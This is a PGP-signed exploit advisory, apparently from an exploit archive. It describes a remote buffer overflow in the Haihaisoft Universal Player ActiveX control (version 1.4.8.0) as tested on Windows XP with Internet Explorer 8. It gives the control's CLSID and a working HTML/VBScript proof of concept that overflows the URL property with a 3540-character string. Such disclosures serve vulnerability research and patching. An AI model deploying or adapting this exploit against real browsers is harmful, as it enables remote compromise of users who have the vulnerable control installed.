-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------
Haihaisoft Universal Player ActiveX Control Remote Buffer Overflow
url: www.haihaisoft.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net/
File: MyActiveX.ocx
Ver.: 1.4.8.0
ProgID: MYACTIVEX.MyActiveXCtrl.1
Descr.: Haihaisoft Universal Player ActiveX Control
Marked: RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
Member: URL (other members could be vulnerable too)
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP3 with Internet Explorer 8
- --------------------------------------------------------------------
<object classid='clsid:1A01FF01-EA62-4702-B837-1E07158145FA' id='test'></object>
<script language='vbscript'>
buff = String(3540, "A")
test.URL = "http://" + buff
</script>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)
iQIcBAEBAgAGBQJLE38TAAoJEGLxkZuDw5+s86QP/3pQnW0jVj0s/Oc8QVswPbpG
JF2hCsLNkf+qz6QnhGTiAQyImpESgbOOjo6+UN8e5meCasuRlhAF8VdQObeAAEBM
oSWMW9GpaqBLfkFKa94WpFG4h+eLsHRHHV83uTYI4z6Dl7j5igPKf59ciMbS1rJa
hZ2eHhU6fZi049WIUGP8XmCuBbSEZFD6zbrontVNYsaJlQTX5cdb4ay9wHj0xGSF
wIv8Ux1FIiS5ToUAyMMAX2IZcN5GIE3qmEkewiwsVKzQDlAD0uampMkIssb3s4r5
/Stdc5dTpHWiOf9jp3g7/Xhv8pyFPm52Ru1s9BoxlQu62nPAc+G4yXF5+yMWMzFb
XDCPH0I37pWUGJ8AIg0gzZxC2IvBPDgXC7MKRohuN391CZtDBMC6jMnpGWw898At
2BZNoLYJF32RsYM9dFT47DWWrN2ag1gx7i6dMTh8W/FWC29TFEiH28hpDbUHme1b
FwWQjtAzPNC1M0eTvnpW7zQ2ckwE+9ARUe590TdoFAIxNnIyyLe3pvQGSxos7MkM
x+O7YB8qnJcr7hoEvWONoneng5UVKq1JFZ1hk0GxDIgTtxXHf7VicCjF9mZLCCKe
YpbdIy5ukF+/ZNj1c7IdoaHHhGmOITYyQgUxWoF6Z6WGdOgMmCuf+TbzDnfhV7Mj
2uODdURsFLXuYUkEP9Zo
=Wwmo
-----END PGP SIGNATURE-----